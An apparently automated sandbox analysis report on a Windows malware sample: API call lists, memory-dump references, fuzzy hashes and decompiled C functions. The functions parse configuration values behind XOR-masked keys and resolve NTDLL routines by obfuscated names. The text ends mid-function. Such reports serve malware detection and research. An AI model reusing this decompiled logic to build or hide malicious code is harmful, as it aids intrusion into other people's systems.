                                                                                                                                                                                                    0x04f61ad2
                                                                                                                                                                                                    0x04f61add

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F662FC: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04F61A4A,253D7325,00000000,00000000,74ECC740,?,?,04F61EFB,?), ref: 04F66363
                                                                                                                                                                                                      • Part of subcall function 04F662FC: sprintf.NTDLL ref: 04F66384
                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F61EFB,?,059295B0), ref: 04F61A5B
                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,04F61EFB,?,059295B0), ref: 04F61A63
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • strcpy.NTDLL ref: 04F61A7A
                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 04F61A85
                                                                                                                                                                                                      • Part of subcall function 04F698DC: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04F61A94,00000000,?,?,?,04F61EFB,?,059295B0), ref: 04F698F3
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F61EFB,?,059295B0), ref: 04F61AA2
                                                                                                                                                                                                      • Part of subcall function 04F6A79A: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F61AAE,00000000,?,?,04F61EFB,?,059295B0), ref: 04F6A7A4
                                                                                                                                                                                                      • Part of subcall function 04F6A79A: _snprintf.NTDLL ref: 04F6A802
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                    • Opcode ID: e2e8da54683b98a07aade73e622fa2362c6ab31b0df4caffe29400fbbc0225fd
                                                                                                                                                                                                    • Instruction ID: 0d0f47276bdfb1c1892613829212cd76cb0d3182e788d1f61d4eb63888640a84
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e8da54683b98a07aade73e622fa2362c6ab31b0df4caffe29400fbbc0225fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B611E977D015297BAB1277B99C84C6F3ABCDE496A83050215F906E7101DE79FC038BA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                    			E04F62E55(int* __ecx) {
                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t18;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				char* _t29;
                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                    				char* _t32;
                                                                                                                                                                                                    				char* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t71 = __ecx;
                                                                                                                                                                                                    				_t18 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    				if(E04F63034( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                                                                                                                                                                    					 *0x4f6d2d0 = _v12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t23 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    				if(E04F63034( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
                                                                                                                                                                                                    					_push(2);
                                                                                                                                                                                                    					_pop(0);
                                                                                                                                                                                                    					goto L48;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t70 = _v12;
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t29 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t65 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t29 = E04F66676(_t71, _t70, _t65 ^ 0x724e87bc);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t29 != 0) {
                                                                                                                                                                                                    						_t71 =  &_v8;
                                                                                                                                                                                                    						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                                                                                                                                                                                    							 *0x4f6d240 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t30 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t61 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t30 = E04F66676(_t71, _t70, _t61 ^ 0x2b40cc40);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t30 != 0) {
                                                                                                                                                                                                    						_t71 =  &_v8;
                                                                                                                                                                                                    						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                                                                                                                                                                                    							 *0x4f6d244 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t31 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t57 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t31 = E04F66676(_t71, _t70, _t57 ^ 0x3b27c2e6);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                                                    						_t71 =  &_v8;
                                                                                                                                                                                                    						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                                                                                                                                                                    							 *0x4f6d248 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t32 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t53 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t32 = E04F66676(_t71, _t70, _t53 ^ 0x0602e249);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t71 =  &_v8;
                                                                                                                                                                                                    						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                                                                                                                                                                    							 *0x4f6d004 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t49 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t33 = E04F66676(_t71, _t70, _t49 ^ 0x3603764c);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                                                    						_t71 =  &_v8;
                                                                                                                                                                                                    						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                                                                                                                                                                    							 *0x4f6d02c = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t34 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t34 = E04F66676(_t71, _t70, _t45 ^ 0x2cc1f2fd);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                    						_push(_t34);
                                                                                                                                                                                                    						_t42 = 0x10;
                                                                                                                                                                                                    						_t43 = E04F65AC8(_t42);
                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                    							_push(_t43);
                                                                                                                                                                                                    							E04F659EE();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                    						_t35 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t40 =  *0x4f6d2a0; // 0x63699bc3
                                                                                                                                                                                                    						_t35 = E04F66676(_t71, _t70, _t40 ^ 0xb30fc035);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t35 != 0 && E04F65AC8(0, _t35) != 0) {
                                                                                                                                                                                                    						_t85 =  *0x4f6d324; // 0x59295b0
                                                                                                                                                                                                    						E04F6972C(_t85 + 4, _t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					HeapFree( *0x4f6d238, 0, _t70);
                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


























                                                                                                                                                                                                    0x04f62e55
                                                                                                                                                                                                    0x04f62e58
                                                                                                                                                                                                    0x04f62e78
                                                                                                                                                                                                    0x04f62e86
                                                                                                                                                                                                    0x04f62e86
                                                                                                                                                                                                    0x04f62e8b
                                                                                                                                                                                                    0x04f62ea5
                                                                                                                                                                                                    0x04f6302c
                                                                                                                                                                                                    0x04f6302e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62eab
                                                                                                                                                                                                    0x04f62eab
                                                                                                                                                                                                    0x04f62eb2
                                                                                                                                                                                                    0x04f62ec8
                                                                                                                                                                                                    0x04f62eb4
                                                                                                                                                                                                    0x04f62eb4
                                                                                                                                                                                                    0x04f62ec1
                                                                                                                                                                                                    0x04f62ec1
                                                                                                                                                                                                    0x04f62ed2
                                                                                                                                                                                                    0x04f62ed4
                                                                                                                                                                                                    0x04f62ede
                                                                                                                                                                                                    0x04f62ee3
                                                                                                                                                                                                    0x04f62ee3
                                                                                                                                                                                                    0x04f62ede
                                                                                                                                                                                                    0x04f62eea
                                                                                                                                                                                                    0x04f62f00
                                                                                                                                                                                                    0x04f62eec
                                                                                                                                                                                                    0x04f62eec
                                                                                                                                                                                                    0x04f62ef9
                                                                                                                                                                                                    0x04f62ef9
                                                                                                                                                                                                    0x04f62f04
                                                                                                                                                                                                    0x04f62f06
                                                                                                                                                                                                    0x04f62f10
                                                                                                                                                                                                    0x04f62f15
                                                                                                                                                                                                    0x04f62f15
                                                                                                                                                                                                    0x04f62f10
                                                                                                                                                                                                    0x04f62f1c
                                                                                                                                                                                                    0x04f62f32
                                                                                                                                                                                                    0x04f62f1e
                                                                                                                                                                                                    0x04f62f1e
                                                                                                                                                                                                    0x04f62f2b
                                                                                                                                                                                                    0x04f62f2b
                                                                                                                                                                                                    0x04f62f36
                                                                                                                                                                                                    0x04f62f38
                                                                                                                                                                                                    0x04f62f42
                                                                                                                                                                                                    0x04f62f47
                                                                                                                                                                                                    0x04f62f47
                                                                                                                                                                                                    0x04f62f42
                                                                                                                                                                                                    0x04f62f4e
                                                                                                                                                                                                    0x04f62f64
                                                                                                                                                                                                    0x04f62f50
                                                                                                                                                                                                    0x04f62f50
                                                                                                                                                                                                    0x04f62f5d
                                                                                                                                                                                                    0x04f62f5d
                                                                                                                                                                                                    0x04f62f68
                                                                                                                                                                                                    0x04f62f6a
                                                                                                                                                                                                    0x04f62f74
                                                                                                                                                                                                    0x04f62f79
                                                                                                                                                                                                    0x04f62f79
                                                                                                                                                                                                    0x04f62f74
                                                                                                                                                                                                    0x04f62f80
                                                                                                                                                                                                    0x04f62f96
                                                                                                                                                                                                    0x04f62f82
                                                                                                                                                                                                    0x04f62f82
                                                                                                                                                                                                    0x04f62f8f
                                                                                                                                                                                                    0x04f62f8f
                                                                                                                                                                                                    0x04f62f9a
                                                                                                                                                                                                    0x04f62f9c
                                                                                                                                                                                                    0x04f62fa6
                                                                                                                                                                                                    0x04f62fab
                                                                                                                                                                                                    0x04f62fab
                                                                                                                                                                                                    0x04f62fa6
                                                                                                                                                                                                    0x04f62fb2
                                                                                                                                                                                                    0x04f62fc8
                                                                                                                                                                                                    0x04f62fb4
                                                                                                                                                                                                    0x04f62fb4
                                                                                                                                                                                                    0x04f62fc1
                                                                                                                                                                                                    0x04f62fc1
                                                                                                                                                                                                    0x04f62fcc
                                                                                                                                                                                                    0x04f62fce
                                                                                                                                                                                                    0x04f62fd1
                                                                                                                                                                                                    0x04f62fd2
                                                                                                                                                                                                    0x04f62fd9
                                                                                                                                                                                                    0x04f62fdb
                                                                                                                                                                                                    0x04f62fdc
                                                                                                                                                                                                    0x04f62fdc
                                                                                                                                                                                                    0x04f62fd9
                                                                                                                                                                                                    0x04f62fe3
                                                                                                                                                                                                    0x04f62ff9
                                                                                                                                                                                                    0x04f62fe5
                                                                                                                                                                                                    0x04f62fe5
                                                                                                                                                                                                    0x04f62ff2
                                                                                                                                                                                                    0x04f62ff2
                                                                                                                                                                                                    0x04f62ffd
                                                                                                                                                                                                    0x04f6300b
                                                                                                                                                                                                    0x04f63015
                                                                                                                                                                                                    0x04f63015
                                                                                                                                                                                                    0x04f63022
                                                                                                                                                                                                    0x04f6302f
                                                                                                                                                                                                    0x04f63033
                                                                                                                                                                                                    0x04f63033

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F65068,?,63699BC3,04F65068,?,63699BC3,00000005,04F6D00C,00000008,?,04F65068), ref: 04F62EDA
                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F65068,?,63699BC3,04F65068,?,63699BC3,00000005,04F6D00C,00000008,?,04F65068), ref: 04F62F0C
                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F65068,?,63699BC3,04F65068,?,63699BC3,00000005,04F6D00C,00000008,?,04F65068), ref: 04F62F3E
                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F65068,?,63699BC3,04F65068,?,63699BC3,00000005,04F6D00C,00000008,?,04F65068), ref: 04F62F70
                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,04F65068,?,63699BC3,04F65068,?,63699BC3,00000005,04F6D00C,00000008,?,04F65068), ref: 04F62FA2
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,04F65068,04F65068,?,63699BC3,04F65068,?,63699BC3,00000005,04F6D00C,00000008,?,04F65068), ref: 04F63022
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                    • Opcode ID: 08f1650b0c799f25abe15e9df1857ddb027eac4180d27863016f7b9ac6ef0ad8
                                                                                                                                                                                                    • Instruction ID: 70c9955d61bfc3dc790a14335f3fbf1a1ddcef3a60e42f9f9b9fb8d122376b02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08f1650b0c799f25abe15e9df1857ddb027eac4180d27863016f7b9ac6ef0ad8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66517071F10209EEE710FBB9EE88D5B77ADEB48744B6909A9E403D7108E635FD069720
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 04F6A290
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 04F6A2A4
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 04F6A2B6
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F6A31E
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F6A32D
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 04F6A338
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                    • Opcode ID: bb60a0a7053c14ce6972677799475ec5f8534292c8009b1c6eb2dddfecf161c3
                                                                                                                                                                                                    • Instruction ID: 4fa2eb496564a427a0713b5e1590e0134ff53f1f105a535de4d9acb7907ba461
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb60a0a7053c14ce6972677799475ec5f8534292c8009b1c6eb2dddfecf161c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD413A36D00609ABDB01DFACD945A9EB7BAEF49300F144426ED15FB210DA76AD06CB91
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F6933F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t54 = E04F68D59(0x20);
                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t23 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t1 = _t23 + 0x4f6e11a; // 0x4c44544e
                                                                                                                                                                                                    					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                    					_t26 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t2 = _t26 + 0x4f6e769; // 0x7243775a
                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                    					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                    					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						E04F6677C(_t54);
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t30 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    						_t5 = _t30 + 0x4f6e756; // 0x614d775a
                                                                                                                                                                                                    						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                    						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t33 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    							_t7 = _t33 + 0x4f6e40b; // 0x6e55775a
                                                                                                                                                                                                    							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                    							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t36 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    								_t9 = _t36 + 0x4f6e4d2; // 0x4e6c7452
                                                                                                                                                                                                    								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                    								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t39 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    									_t11 = _t39 + 0x4f6e779; // 0x6c43775a
                                                                                                                                                                                                    									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                    									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                    										_t44 = E04F65194(_t54, _a8);
                                                                                                                                                                                                    										_v8 = _t44;
                                                                                                                                                                                                    										if(_t44 != 0) {
                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											 *_a12 = _t54;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x04f6934e
                                                                                                                                                                                                    0x04f69352
                                                                                                                                                                                                    0x04f69414
                                                                                                                                                                                                    0x04f69358
                                                                                                                                                                                                    0x04f69358
                                                                                                                                                                                                    0x04f6935d
                                                                                                                                                                                                    0x04f69370
                                                                                                                                                                                                    0x04f69372
                                                                                                                                                                                                    0x04f69377
                                                                                                                                                                                                    0x04f6937f
                                                                                                                                                                                                    0x04f69386
                                                                                                                                                                                                    0x04f69388
                                                                                                                                                                                                    0x04f6938d
                                                                                                                                                                                                    0x04f6940c
                                                                                                                                                                                                    0x04f6940d
                                                                                                                                                                                                    0x04f6938f
                                                                                                                                                                                                    0x04f6938f
                                                                                                                                                                                                    0x04f69394
                                                                                                                                                                                                    0x04f6939c
                                                                                                                                                                                                    0x04f6939e
                                                                                                                                                                                                    0x04f693a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f693a5
                                                                                                                                                                                                    0x04f693a5
                                                                                                                                                                                                    0x04f693aa
                                                                                                                                                                                                    0x04f693b2
                                                                                                                                                                                                    0x04f693b4
                                                                                                                                                                                                    0x04f693b9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f693bb
                                                                                                                                                                                                    0x04f693bb
                                                                                                                                                                                                    0x04f693c0
                                                                                                                                                                                                    0x04f693c8
                                                                                                                                                                                                    0x04f693ca
                                                                                                                                                                                                    0x04f693cf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f693d1
                                                                                                                                                                                                    0x04f693d1
                                                                                                                                                                                                    0x04f693d6
                                                                                                                                                                                                    0x04f693de
                                                                                                                                                                                                    0x04f693e0
                                                                                                                                                                                                    0x04f693e5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f693e7
                                                                                                                                                                                                    0x04f693ed
                                                                                                                                                                                                    0x04f693f2
                                                                                                                                                                                                    0x04f693f9
                                                                                                                                                                                                    0x04f693fe
                                                                                                                                                                                                    0x04f69403
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f69405
                                                                                                                                                                                                    0x04f69408
                                                                                                                                                                                                    0x04f69408
                                                                                                                                                                                                    0x04f69403
                                                                                                                                                                                                    0x04f693e5
                                                                                                                                                                                                    0x04f693cf
                                                                                                                                                                                                    0x04f693b9
                                                                                                                                                                                                    0x04f693a3
                                                                                                                                                                                                    0x04f6938d
                                                                                                                                                                                                    0x04f69422

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F68DB5,?,00000001,?,?,00000000,00000000), ref: 04F69364
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F69386
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F6939C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F693B2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F693C8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F693DE
                                                                                                                                                                                                      • Part of subcall function 04F65194: memset.NTDLL ref: 04F65213
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1886625739-0
                                                                                                                                                                                                    • Opcode ID: 2576d5aa2a94a7b5d0293780d46353039bc7563a21e3857a7b0f254d125af92c
                                                                                                                                                                                                    • Instruction ID: e5ab877d546e92f82412021a146d0a834430fa7720974ebc3e44bbf7d03e4c2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2576d5aa2a94a7b5d0293780d46353039bc7563a21e3857a7b0f254d125af92c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63214FB560060AEFEB10EF69DC44D5BB7ECEF483447058426E91ACB211EBB4E906CB70
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                    			E04F66791(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                    				signed int* _v16;
                                                                                                                                                                                                    				void _v284;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                    				char _t68;
                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                    				int _t102;
                                                                                                                                                                                                    				signed int* _t104;
                                                                                                                                                                                                    				intOrPtr* _t105;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t97 = __ecx;
                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                    				_t102 = _a16;
                                                                                                                                                                                                    				if(_t102 == 0) {
                                                                                                                                                                                                    					__imp__( &_v284,  *0x4f6d33c);
                                                                                                                                                                                                    					_t96 = 0x80000002;
